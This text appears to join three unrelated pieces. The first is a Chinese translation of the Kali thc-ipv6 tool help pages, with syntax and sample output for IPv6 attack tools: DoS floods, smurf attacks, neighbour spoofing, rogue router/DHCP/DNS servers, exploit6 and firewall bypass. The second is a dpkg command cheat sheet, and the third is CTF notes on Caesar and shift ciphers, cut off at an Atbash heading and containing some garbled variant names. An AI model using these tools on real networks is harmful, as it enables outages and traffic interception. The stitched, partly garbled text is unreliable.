如果没有提供test-case-number,则只显示攻击列表。 ``` ### detect-new-ip6 - 此工具可以检测加入本地网络的新ipv6地址 ``` root@kali:~# detect-new-ip6 detect-new-ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:detect-new-ip6 interface [script] 此工具可以检测加入本地网络的新ipv6地址。 如果提供了脚本,则首先对检测到的IPv6地址执行此脚本, 然后再对接口执行。 ``` ### detect_sniffer6 - 测试本地LAN上的系统是否正在被嗅探 ``` root@kali:~# detect_sniffer6 detect_sniffer6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:detect_sniffer6 interface [target6] 测试本地LAN上的系统是否正在被嗅探。 适用于Windows、Linux、OS/X和*BSD 如果没有给出目标,则使用link-local-all-nodes地址,但是很少有效。 ``` ### dnsdict6 - 枚举DNS条目的域 ``` root@kali:~# dnsdict6 dnsdict6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dnsdict6 [-d46] [-s | -m | -l | -x] [-t THREADS] [-D] domain [dictionary-file] 枚举DNS条目的域,如果提供了它使用字典文件, 否则使用内置列表。这个工具是基于gnucitizen.org的dnsmap。 选项: -4 转储IPv4地址 -t NO 指定要使用的线程数(默认值:8,最大值:32)。 -D 转储选定的内置字列表,不进行扫描。 -d 显示NS和MX类型DNS域的IPv6信息。 -S 执行SRV服务名猜解 -[smlx] 选择字典大小:-s(小=50)、-m(中=796)(默认) -l(大=1416)、-x(极大=3211) ``` ### dnsrevenum6 - 执行快速反向DNS枚举,并能够应对慢速服务器 ``` root@kali:~# dnsrevenum6 dnsrevenum6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dnsrevenum6 dns-server ipv6address 执行快速反向DNS枚举,并能够应对慢速服务器。 例子: dnsrevenum6 dns.test.com 2001:db8:42a8::/48 dnsrevenum6 dns.test.com 8.a.2.4.8.b.d.0.1.0.0.2.ip6.arpa ``` ### dnssecwalk - 执行DNSSEC NSEC漫游 ``` root@kali:~# dnssecwalk dnssecwalk v1.2 (c) 2013 by Marc Heuse <mh@mh-sec.de> http://www.mh-sec.de 语法:dnssecwalk [-e46] dns-server domain 选项: -e 确保域位于找到的地址中,否则退出 -4 解析找到条目的IPv4地址 -6 解析找到条目的IPv6地址 执行DNSSEC NSEC漫游。 示例:dnssecwalk dns.test.com test.com ``` ### dos_mld.sh - 如果指定,将首先丢弃目标的多播地址 ``` root@kali:~# dos_mld.sh 语法:/usr/bin/dos_mld.sh [-2] interface [target-link-local-address multicast-address] 如果指定,目标的多播地址将首先丢弃。 所有的组播流量都会在一段时间后停止。 指定-2选项使用MLDv2。 ``` ### dos-new-ip6 - 此工具可阻止新的ipv6接口出现 ``` root@kali:~# dos-new-ip6 dos-new-ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dos-new-ip6 interface 这个工具通过发送重复ip6检查(DAD)应答来阻止新的ipv6接口出现。 这导致对新ipv6设备的DOS攻击。 ``` ### dump_router6 - 转储所有本地路由器信息 ``` root@kali:~# dump_router6 dump_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dump_router6 interface 转储所有本地路由器信息 ``` ### exploit6 - 对目标执行各种CVE已知的IPv6漏洞利用 ``` root@kali:~# exploit6 exploit6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:exploit6 interface destination [test-case-number] 对目标执行各种CVE已知的IPv6漏洞利用 请注意,对于可利用的溢出,仅使用“AAA...”字符串。 如果一个系统很脆弱,那么它会崩溃,所以要小心! 
``` ### extract_hosts6.sh - 打印文件中IPv6地址的主机部分 ``` root@kali:~# extract_hosts6.sh /usr/bin/extract_hosts6.sh FILE 打印文件中IPv6地址的主机部分 ``` ### extract_networks6.sh - 打印文件中找到的网络 ``` root@kali:~# extract_networks6.sh /usr/bin/extract_networks6.sh FILE 打印文件中找到的网络 ``` ### fake_advertise6 - 在网络上公告ipv6地址 ``` root@kali:~# fake_advertise6 fake_advertise6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_advertise6 [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]] 在网络上公告ipv6地址(如果没有指定,则使用自己的mac), 如果没有设置目标地址,则将其发送到全节点多播地址。 源IP地址未设置时使用发送者地址。 发送选项: -n count 发送多少包(默认:永远) -w seconds 发送数据包之间的等待时间(默认值:5) 标志选项: -O 不设置覆盖标志(默认:开) -r 设置路由标志(默认:关) -s 设置请求标志(默认:关) ND安全漏洞选项(可以组合): -H 添加一个逐跳首部 -F 添加一个单次片段首部(可以指定多次) -D 添加一个大的目标首部,分片数据包。 ``` ### fake_dhcps6 - 假冒DHCPv6服务器 ``` root@kali:~# fake_dhcps6 fake_dhcps6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dhcps6 interface network-address / prefix-length dns-server [dhcp-server-ip-address [mac-address]] 假冒DHCPv6服务器,用于配置地址并设置DNS服务器 ``` ### fake_dns6d - 假冒DNS服务器,为任何查找请求提供相同的ipv6地址 ``` root@kali:~# fake_dns6d fake_dns6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dns6d interface ipv6-address [fake-ipv6-address [fake-mac]] 假冒DNS服务器为任何查找请求提供相同的ipv6地址 如果客户端具有固定的DNS服务器,则可以将其与parasite6一起使用 注意:服务器非常简单。不支持数据包中的多重查询,也不支持NS、MX等查询。 ``` ### fake_dnsupdate6 - 假冒DNS更新程序 ``` root@kali:~# fake_dnsupdate6 fake_dnsupdate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dnsupdate6 dns-server full-qualified-host-dns-name ipv6address 示例:fake_dnsupdate6 dns.test.com myhost.sub.test.com ::1 ``` ### fake_mipv6 - 将家乡地址所有数据包重定向到转交地址 ``` root@kali:~# fake_mipv6 fake_mipv6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mipv6 interface home-address home-agent-address care-of-address 如果移动IPv6归属代理被误配置为不使用IPSEC接受MIPV6更新, 则将家乡地址所有数据包重定向到转交地址 ``` ### fake_mld26 ``` root@kali:~# fake_mld26 fake_mld26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mld26 [-l] interface add | delete | query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] 使用MLDv2协议。只有协议功能的一个子集可以通过命令行来实现。如果您需要某些东西,请编写代码。 可在您选择的多播组中公告或删除自己 - 或任何您想要的人,查询网络上谁正在监听组播地址。 使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_mld6 - 公告或删除自己 - 或任何你想要的人 ``` root@kali:~# fake_mld6 fake_mld6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mld6 [-l] interface add | delete | query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] 在您选择的多播组中公告或删除自己 - 或任何您想要的人,查询网络上谁正在监听组播地址。 使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_mldrouter6 - 宣告、删除或索取MLD路由器 ``` root@kali:~# fake_mldrouter6 fake_mldrouter6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mldrouter6 [-l] interface advertise | solicitate | terminate [own-ip [own-mac-address]] 宣告、删除或索取MLD路由器 - 自己或其他人。 使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_pim6 ``` root@kali:~# fake_pim6 fake_pim6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: fake_pim6 [-t ttl] [-s src6] [-d dst6] interface hello [dr_priority] fake_pim6 [-t ttl] [-s src6] [-d dst6] interface join | prune neighbor6 multicast6 target6 hello命令可选DR优先级(默认值:0)。 join和prune命令需要多播组来修改加入或离开邻近PIM路由器的目标地址。 使用-s来欺骗源ip6,-d发送到ff02::d以外的另一个地址,-t设置不同的TTL(默认值:1) ``` ### fake_router26 - 宣告自己为路由器,并尝试成为默认路由器 ``` root@kali:~# fake_router26 fake_router26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_router26 [-E 
type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] [-i interval] interface 选项: -A network/prefix 添加自动配置网络(最多16次) -a seconds -A前缀的有效生命周期(默认为99999) -R network/prefix 添加路由条目(最多16次) -r seconds -R路由条目生存期(默认为4096) -D dns-server 指定DNS服务器(最多16次) -L searchlist 指定DNS域搜索列表,用逗号分隔 -d seconds -D的dns条目生存期(默认为4096) -M mtu 要发送的MTU,默认为接口设置 -s sourceip 路由器的源IP,默认为本地连接 -S sourcemac 路由器的源MAC,默认为您的接口 -l seconds 路由器生命周期(默认为2048) -T ms 可达定时器(默认为0) -t ms 重发定时器(默认为0) -p priority 优先级"low"、"medium"、"high" (默认)、"reserved" -F flags 设置一个或多个以下标志:managed,other,homeagent, proxy, reserved; 用逗号分隔 -E type 路由器通告守护躲避选项。类型: H 简单的逐跳首部 1 简单的一次分片首部(可以添加多个) D 插入一个大的目标首部 O 重叠片段用于keep-first目标(Win,BSD,Mac) o 重叠片段用于keep-last目标(Linux,Solaris) 示例: -E H111, -E D -m mac-address 是否应当只有一台机器接收RA(不与-E DoO同用) -i interval RA包时间间隔(默认值:5) -n number 要发送的RA数量(默认:无限制) 宣告自己为路由器,并尝试成为默认路由器。 如果提供了不存在的本地链接或mac地址,则会导致DOS。 ``` ### fake_router6 - 宣告自己为路由器,并尝试成为默认路由器。 ``` root@kali:~# fake_router6 fake_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_router6 [-HFD] interface network-address / prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]] 宣告自己为路由器,并尝试成为默认路由器。 如果提供了不存在的本地链接或mac地址,则会导致DOS。 选项-H逐跳、-F分片首部、-D目标首部。 ``` ### fake_solicitate6 - 请求ipv6地址 ``` root@kali:~# fake_solicitate6 fake_solicitate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_solicitate6 [-DHF] interface ip-address-solicitated [target-address [mac-address-solicitated [source-ip-address]]] 在网络上请求pv6地址,将其发送到全节点组播地址 ``` ### firewall6 - 执行各种ACL旁路来尝试检查实现 ``` root@kali:~# firewall6 firewall6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:firewall6 [-u] interface destination port [test-case-no] 执行各种ACL旁路来尝试检查实现。 默认用TCP端口,选项-u切换到UDP。 对于所有测试用例来说,必须允许ICMPv6 ping到目的地。 ``` ### flood_advertise6 - 用邻近公告洪泛本地网络 ``` root@kali:~# flood_advertise6 flood_advertise6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_advertise6 interface 用邻近公告洪泛本地网络。 ``` ### flood_dhcpc6 - DHCP洪泛客户端 ``` root@kali:~# flood_dhcpc6 flood_dhcpc6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_dhcpc6 [-n | -N] [-1] [-d] interface [domain-name] DHCP洪泛客户端。用于耗尽DHCP6服务器提供的IP地址池。 注意:如果地址池非常大,那这么做是无意义的。 :-) 默认情况下,本地链路IP和MAC地址是随机的,但是这在某些情况下将不起作用。选项-n将使用 真实MAC,-N使用真实MAC和本地链接地址。-1只会处置一个地址,但不请求它。 如果不使用-N,你应该同时运行parasite6。使用-d强制DNS更新,您可以在命令行中指定一个域名。 ``` ### flood_mld26 - 用MLDv2报告洪泛本地网络 ``` root@kali:~# flood_mld26 flood_mld26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_mld26接口 用MLDv2报告洪泛本地网络。 flood_mld6 - 用MLD报告洪泛本地网络 root @ kali:〜#flood_mld6 flood_mld6 v2.3(c)2013由van Hauser / THC <vh@thc.org> www.thc.org 语法:fflood_mld26 interface 用MLD报告洪泛本地网络。 ``` ### flood_mldrouter6 - 用MLD路由通告洪泛本地网络 ``` root@kali:~# flood_mldrouter6 flood_mldrouter6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_mldrouter6 interface 用MLD路由通告洪泛本地网络。 ``` ### flood_router26 - 用路由通告洪泛本地网络 ``` root@kali:~# flood_router26 flood_router26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_router26 [-HFD] [-s] [-RPA] interface 用路由通告来洪泛本地网络。每个数据包包含17个前缀和路由条目。 -F/-D/-H添加分片/目标/逐跳首部来绕过RA安全警戒。 -R只发送路由条目,没有前缀信息。-P只发送前缀信息,没有路由条目。 -A就像-P,但是实现了George Kargiotakis的攻击以禁用隐私扩展。 选项-s使用小的寿命值来造成更为严重的影响。 ``` ### flood_router6 - 用路由通告洪泛本地网络 ``` root@kali:~# flood_router6 flood_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: flood_router6 [-HFD] interface 用路由通告来洪泛本地网络。-F/-D/-H添加分片/目标/逐跳首部来绕过RA安全警戒。 ``` ### flood_solicitate6 - 
用邻近请求洪泛网络 ``` root@kali:~# flood_solicitate6 flood_solicitate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:flood_solicitate6 interface [target] 用邻近请求洪泛网络。 ``` ### fragmentation6 - 执行片段防火墙和实现检查 ``` root@kali:~# fragmentation6 fragmentation6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fragmentation6 [-fp] [-n number] interface destination [test-case-no] -f激活洪泛模式,发送之间不会暂停; -p首先禁用、最终ping;-n指定每个测试执行的频率。 执行片段防火墙和实现检查,包括拒绝服务。 ``` ### fuzz_ip6 - 模糊icmp6数据包 ``` root@kali:~# fuzz_ip6 fuzz_ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: fuzz_ip6 [-x] [-t number | -T number] [-p number] [-IFSDHRJ] [-X|-1|-2|-3|-4|-5|-6|-7|-8|-9|-0 port] interface unicast-or-multicast-address [address-in-data-pkt] 模糊icmp6数据包。 选项: -X 不添加任何ICMP/TCP首部(传输层) -1 模糊ICMP6 echo请求(默认) -2 模糊ICMP6邻居请求 -3 模糊ICMP6邻近通告 -4 模糊ICMP6路由通告 -5 模糊组播监听报告报文 -6 模糊组播监听完成报文 -7 模糊组播监听查询报文 -8 模糊组播监听v2报告报文 -9 模糊组播监听v2查询报文 -0 模糊节点查询报文 -s port 模糊端口TCP-SYN报文 -x 尝试标志和字节类型的所有256个值 -t number 从第number号继续测试 -T number 只执行第number号测试 -p number 每number次测试执行一个活跃检查(默认:无) -a 不执行初始和最终的活跃测试 -n number 每个报文发送的次数(默认值:1) -I 模糊IP首部 -F 添加并模糊一次分片(对应选项1) -S 添加并模糊源路由(对应选项1) -D 添加并模糊目标首部(对应选项1) -H 添加并模糊逐跳首部(对应选项1和5-9) -R 添加并模糊路由器警报首部头(对应选项5-9和其它全部) -J 添加并模糊jumbo数据包首部(对应选项1) 您只能定义选项-0 ... -9和-s之一,默认为-1。 出错时返回-1,0目标活跃且测试完成,1目标崩溃。 ``` ### implementation6 - 执行一些ipv6实现检查 ``` root@kali:~# implementation6 implementation6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:implementation6 [-p] [-s sourceip6] interface destination [test-case-number] 选项: -s sourceip6 使用指定的源IPv6地址 -p 开始和结束时不执行活跃检查 执行一些ipv6实现检查,也可以用来测试一些防火墙功能。接近2分钟即可完成 ``` ### implementation6d - 通过implementation6工具验证测试包 ``` root@kali:~# implementation6d implementation6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:implementation6d interface 通过implementation6工具验证测试包,对检查什么数据包能通过防火墙很有用 ``` ### inject_alive6 - 此工具用于在PPPoE和6in4隧道上的keep-alive请求 ``` root@kali:~# inject_alive6 inject_alive6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: inject_alive6 [-ap] interface 此工具可解答PPPoE和6in4隧道上的keep-alive请求;对于PPPoE它还发送keep-alive请求。 请注意,必须设置适当的环境变量THC_IPV6_ {PPPOE|6IN4}。 选项-a将每15秒主动发送keep-alive请求,-p不会发送对请求的回复。 ``` ### inverse_lookup6 - 执行反向地址查询 ``` root@kali:~# inverse_lookup6 inverse_lookup6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: inverse_lookup6 interface mac-address 执行反向地址查询,获取分配到MAC地址的IPv6地址。 请注意,只有少数系统支持这一点。 ``` ### kill_router6 - 宣告路由器将把一个目标从路由表中删除 ``` root@kali:~# kill_router6 kill_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:kill_router6 [-HFD] interface router-address [srcmac [dstmac]] 宣告路由器将把一个目标从路由表中删除。如果您提供“*”作为路由器地址,则此工具将嗅探任何网络 RA数据包并立即发送kill数据包。 选项-H添加逐跳首部,-F分片首部,-D目标首部。 ``` ### ndpexhaust26 - 用ICMPv6 TooBig错误消息洪泛目标/64网络 ``` root@kali:~# ndpexhaust26 ndpexhaust26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: ndpexhaust26 [-acpPTUrR] [-s sourceip6] interface target-network 选项: -a 添加一个带路由器警报的逐跳首部 -c 不计算校验和以节省时间 -p 发送ICMPv6回显请求 -P 发送ICMPv6回显应答 -T 发送ICMPv6生存时间 -U 发送ICMPv6不可达(无路由) -r 从您的/64前缀将源随机化 -R 将源完全随机化 -s sourceip6 使用此作为源ipv6地址 用ICMPv6 TooBig错误消息洪泛目标/64网络。 这个工具版本比ndpexhaust6更有效。 ``` ### ndpexhaust6 - 用ICMPv6 TooBig错误消息洪泛目标/64网络 ``` root@kali:~# ndpexhaust6 ndpexhaust6 by mario fleischmann <mario.fleischmann@1und1.de> 语法: ndpexhaust6 interface destination-network [sourceip] 在目标网络中随机ping IP ``` ### node_query6 - 向目标发送ICMPv6节点查询请求 ``` root@kali:~# node_query6 node_query6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: node_query6 interface target 
向目标发送ICMPv6节点查询请求并转储应答。 ``` ### parasite6 - 这是IPv6的“ARP spoofer” ``` root@kali:~# parasite6 parasite6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:parasite6 [-lRFHD] interface [fake-mac] 这是IPv6的“ARP spoofer”,通过对Neighbor Solitication请求的误导应答, 将所有本地流量重定向到您自己的系统(或虚假的,如果假冒mac不存在)。 选项-l循环并每5秒对每个目标重新发送数据包,-R也将尝试注入请求的目标。 NS安全规避:-F片段,-H逐跳,-D大的目标首部 ``` ### passive_discovery6 - 被动地嗅探网络并转储所有客户端的IPv6地址 ``` root@kali:~# passive_discovery6 passive_discovery6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:passive_discovery6 [-Ds] [-m maxhop] [-R prefix] interface [script] 选项: -D 转储目标地址(不适用于-m) -s 只打印地址,没有其他输出 -m maxhop 被转储的目标的最大跳数。0表示仅限本地,最大限度通常为5 -R prefix 将定义的前缀与本地链路前缀进行交换 被动嗅探网络并转储检测到的所有客户端IPv6地址。 请注意,在运行parasite6的环境中能获得更好的结果,但这会影响网络。 如果在接口后面指定了一个脚本名称,它将首先被用于检测到的ipv6地址,然后是接口。 ``` ### randicmp6 - 将所有ICMPv6类型和代码组合发送到目标 ``` root@kali:~# randicmp6 Syntax: randicmp6 [-s sourceip] interface destination [type [code]] 将所有ICMPv6类型和代码组合发送到目标。选项-s设置源ipv6地址。 ``` ### redir6 - 植入路由,将所有到target-ip的流量重定向到victim-ip ``` root@kali:~# redir6 redir6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:redir6 interface victim-ip target-ip original-router new-router [new-router-mac] [hop-limit] 将一条路由植入victim-ip,将到target-ip的所有流量重定向到新ip。您必须知道将处理路由的路由器。 如果new-router-mac不存在,则会导致DOS。如果目标的TTL不是64,则将此指定为最后一个选项。 ``` ### redirsniff6 - 植入路由,将所有到destination-ip的流量重定向到victim-ip ``` root@kali:~# redirsniff6 redirsniff6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:redirsniff6 interface victim-ip destination-ip original-router [new-router [new-router-mac]] 将路由插入victim-ip,将所有到destination-ip的流量重定向到新路由器。这通过修改 匹配victim->target的所有流量来完成。您必须知道将处理路由的路由器。 如果新路由器或mac不存在,则会导致DOS。 您可以为victim-ip和/或destination-ip提供通配符('*')。 ``` ### rsmurf6 - 攻击victim的本地网络 ``` root@kali:~# rsmurf6 rsmurf6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:rsmurf6 interface victim-ip 攻击victim的本地网络。注意:这取决于一个实现上的错误,目前只在Linux上验证过。 邪恶:将“ff02: 1”作为victim将彻底DOS你的本地局域网。 ``` ### sendpees6 - 发送SEND邻近请求消息 ``` root@kali:~# sendpees6 sendpees6 by willdamn <willdamn@gmail.com> 用法: sendpees6 <inf> <key_length> <prefix> <victim> 发送SEND邻近请求消息,使目标验证一个lota CGA和RSA签名 ``` ### sendpeesmp6 - 发送SEND邻居请求消息 ``` root@kali:~# sendpeesmp6 原始sendpees作者willdamn <willdamn@gmail.com> 修改的sendpeesMP作者Marcin Pohl <marcinpohl@gmail.com> 基于thc-ipv6的代码 用法:sendpeesmp6 <inferface> <key_length> <prefix> <victim> 发送SEND邻近请求消息,并使目标验证一个lota CGA和RSA签名 示例:sendpeesmp6 eth0 2048 fe80:: fe80::1 ``` ### smurf6 - 用icmp echo应答攻击目标 ``` root@kali:~# smurf6 smurf6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:smurf6 interface victim-ip [multicast-network-address] 用icmp echo应答攻击目标。如果未指定,echo请求的目标是本地全节点组播地址。 ``` ### thcping6 - 制作您的特殊icmpv6 echo请求包 ``` root@kali:~# thcping6 thcping6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: thcping6 [-af] [-H o:s:v] [-D o:s:v] [-F dst] [-t ttl] [-c class] [-l label] [-d size] [-S port|-U port] interface src6 dst6 [srcmac [dstmac [data]]] 制作您的特殊icmpv6 echo请求数据包。您可以在src6、srcmac和dstmac中输入“x”作为自动值。 选项: -a 添加带有路由警报的逐跳首部 -q 添加带有quickstart的逐跳首部 -E 以以太网IPv4的形式发送 -H o:s:v 添加具有特殊内容的逐跳首部 -D o:s:v 添加具有特殊内容的目标首部 -D “xxx” 添加一个能导致分片的大的目标首部 -f 添加一个一次分片首部 -F ipv6address 使用源路由到最终目标 -t ttl 指定TTL(默认值:64) -c class 指定一个类(0-4095) -l label 指定标签(0-1048575) -d data_size 定义ping数据缓冲区的大小 -S port 在定义的端口上使用TCP SYN数据包,而不是ping -U port 在定义的端口上使用UDP数据包,而不是ping o:s:v语法:选项号:大小:值,值为十六进制,例如1:2:feab 出错或无应答时返回-1,0正常,1错误应答。 ``` ### thcsyn6 - 使用TCP-SYN数据包泛洪目标端口 ``` root@kali:~# thcsyn6 thcsyn6 v2.3 (c) 2013 by van Hauser / THC 
<vh@thc.org> www.thc.org 语法: thcsyn6 [-AcDrRS] [-p port] [-s sourceip6] interface target port 选项: -A 发送TCP-ACK数据包 -S 发送TCP-SYN-ACK数据包 -r 通过您的/64前缀随机化源 -R 将源完全随机化 -s sourceip6 使用此作为源ipv6地址 -D 随机化目标(视为/64) -p port 使用固定源端口 用TCP-SYN数据包泛洪目标端口。如果你提供“x”作为端口,那么是随机的 ``` ### toobig6 - 在目标上植入指定的mtu ``` root@kali:~# toobig6 toobig6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:toobig6 [-u] interface target-ip existing-ip mtu [hop-limit] 在目标上植入指定的mtu。如果目标的TTL不是64,则应指定为最后一个选项。 选项-u将发送TooBig,而不会从现有的ip发出欺骗ping6。 ``` ### trace6 - 一个基本但非常快的traceroute6程序 ``` root@kali:~# trace6 trace6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:trace6 [-abdt] [-s src6] interface targetaddress [port] 选项: -a 插入带有路由警报的逐跳首部 -D 插入目标扩展首部 -E 插入带有无效选项的目标扩展首部 -F 插入一次分片首部 -b 使用TooBig(你将看不到目标),而不是ICMP6 Ping -B 使用PingReply(你将看不到目标),而不是ICMP6 Ping -d 解析IPv6地址 -t 启用隧道检测 -s src6 指定源IPv6地址 最大跳数可达31 一个基本但非常快的traceroute6程序。如果没有指定端口,则使用ICMP6 Ping请求, 否则对指定的端口使用TCP SYN数据包。选项D、E和F可以多次使用。 ``` ## address6用法示例 将IPv6地址转换为MAC地址或相反: ``` root@kali:~# address6 fe80::76d4:35ff:fe4e:39c8 74:d4:35:4e:39:c8 root@kali:~# address6 74:d4:35:4e:39:c8 fe80::76d4:35ff:fe4e:39c8 ``` ## alive6用法示例 ``` root@kali:~# alive6 eth0 Alive: fd77:7c68:420a:1:426c:8fff:fe1b:cb90 [ICMP parameter problem] Alive: fd77:7c68:420a:1:20c:29ff:fee5:5bf4 [ICMP echo-reply] Alive: fd77:7c68:420a:1:75d9:4f39:a46a:6f83 [ICMP echo-reply] Alive: fd77:7c68:420a:1:6912:8e80:e02f:1969 [ICMP echo-reply] Alive: fd77:7c68:420a:1:201:6cff:fe6f:ddd1 [ICMP echo-reply] ``` ## detect-new-ip6用法示例 ``` root@kali:~# detect-new-ip6 eth0 Started ICMP6 DAD detection (Press Control-C to end) ... Detected new ip6 address: fe80::85d:9879:9251:853a ``` ## dnsdict6用法示例 ``` root@kali:~# dnsdict6 example.com Starting DNS enumeration work on example.com. ... Starting enumerating example.com. - creating 8 threads for 798 words... Estimated time to completion: 1 to 2 minutes www.example.com. => 2606:2800:220:6d:26bf:1447:1097:aa7 ``` 原文链接:[http://tools.kali.org/information-gathering/thc-ipv6](http://tools.kali.org/information-gathering/thc-ipv6)
dpkg
===

Install, build and manage software packages on Debian Linux systems

## Description

The **dpkg command** is the utility Debian Linux systems use to install, build and manage software packages.

### Syntax

```shell
dpkg(options)(parameters)
```

### Options

```shell
-i: install a package;
-r: remove a package;
-P: remove a package together with its configuration files;
-L: list the files associated with a package;
-l: list installed packages;
--unpack: unpack a package;
-c: list the contents of a package archive;
--configure: configure a package.
```

### Parameters

Deb package: the .deb package to operate on.

### Examples

```shell
dpkg -i package.deb         # install a package
dpkg -r package             # remove a package
dpkg -P package             # remove a package (including its config files)
dpkg -L package             # list the files associated with the package
dpkg -l package             # show the package version
dpkg --unpack package.deb   # unpack the contents of a deb package
dpkg -S keyword             # search which package a file belongs to
dpkg -l                     # list currently installed packages
dpkg -c package.deb         # list the contents of a deb package
dpkg --configure package    # configure a package
```
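Two more handy actions not in the list above — dpkg forwards them to `dpkg-deb`:

```bash
dpkg -x package.deb ./extracted          # extract the filesystem tree without installing
dpkg -e package.deb ./extracted/DEBIAN   # extract the control information files
```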
# Monoalphabetic Substitution Ciphers

## Common Characteristics

In monoalphabetic substitution, almost all schemes share one property: plaintext and ciphertext characters correspond one to one. Consequently, there are generally two ways to break them:

- brute force, when the key space is small
- frequency analysis, when the ciphertext is long enough: http://quipqiup.com/

When the key space is large enough and the ciphertext short enough, breaking them is rather difficult.

## Caesar Cipher

### Principle

The Caesar cipher encrypts by shifting **every letter** of the plaintext a fixed number of positions forward (or backward) in alphabetical order (**wrapping around**) to produce the ciphertext. For example, with a left shift of 3 (so the key for decryption is 3):

```
Plaintext alphabet:  ABCDEFGHIJKLMNOPQRSTUVWXYZ
Ciphertext alphabet: DEFGHIJKLMNOPQRSTUVWXYZABC
```

To encrypt, one looks up the position of each letter of the message in the plaintext alphabet and writes down the corresponding letter of the ciphertext alphabet. The recipient, knowing the key in advance, reverses the operation to recover the original plaintext. For example:

```
Plaintext:  THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
Ciphertext: WKH TXLFN EURZQ IRA MXPSV RYHU WKH ODCB GRJ
```

Depending on the offset, there are also **several specifically named Caesar variants**:

- offset 10: Avocat (A→K)
- offset 13: [ROT13](https://zh.wikipedia.org/wiki/ROT13)
- offset -5: Cassis (K 6)
- offset -6: Cassette (K 7)

In addition, there is a keyed Caesar cipher. Its basic idea is to **take a key, convert each of its characters to a number (usually its position in the alphabet), and use that number as the shift key for the corresponding position of the plaintext.**

Here we take **Crypto 100 from the XMan session-1 summer camp sharing contest (team 宫保鸡丁)** as an example:

```
Ciphertext: s0a6u3u1s0bv1a
Key:        guangtou
Offsets:    6,20,0,13,6,19,14,20
Plaintext:  y0u6u3h1y0uj1u
```

### Breaking

For the unkeyed Caesar cipher, there are two basic approaches:

1. enumerate all 26 offsets, which works in the general case
2. use frequency analysis, which works when the ciphertext is long

The first approach is guaranteed to produce the plaintext; the second is not.

For the keyed Caesar cipher, generally speaking, you must know the corresponding key.

### Tools

The following tools are available; JPK is the most general.

- JPK, handles both keyed and unkeyed variants
- http://planetcalc.com/1434/
- http://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php

## Shift Cipher

Similar to the Caesar cipher, except that a shift cipher processes not only letters but also digits and special characters, commonly shifting over the ASCII table. It is broken the same way: enumerate all the possibilities to obtain candidate results.

## Atbash Cipher

### Principle

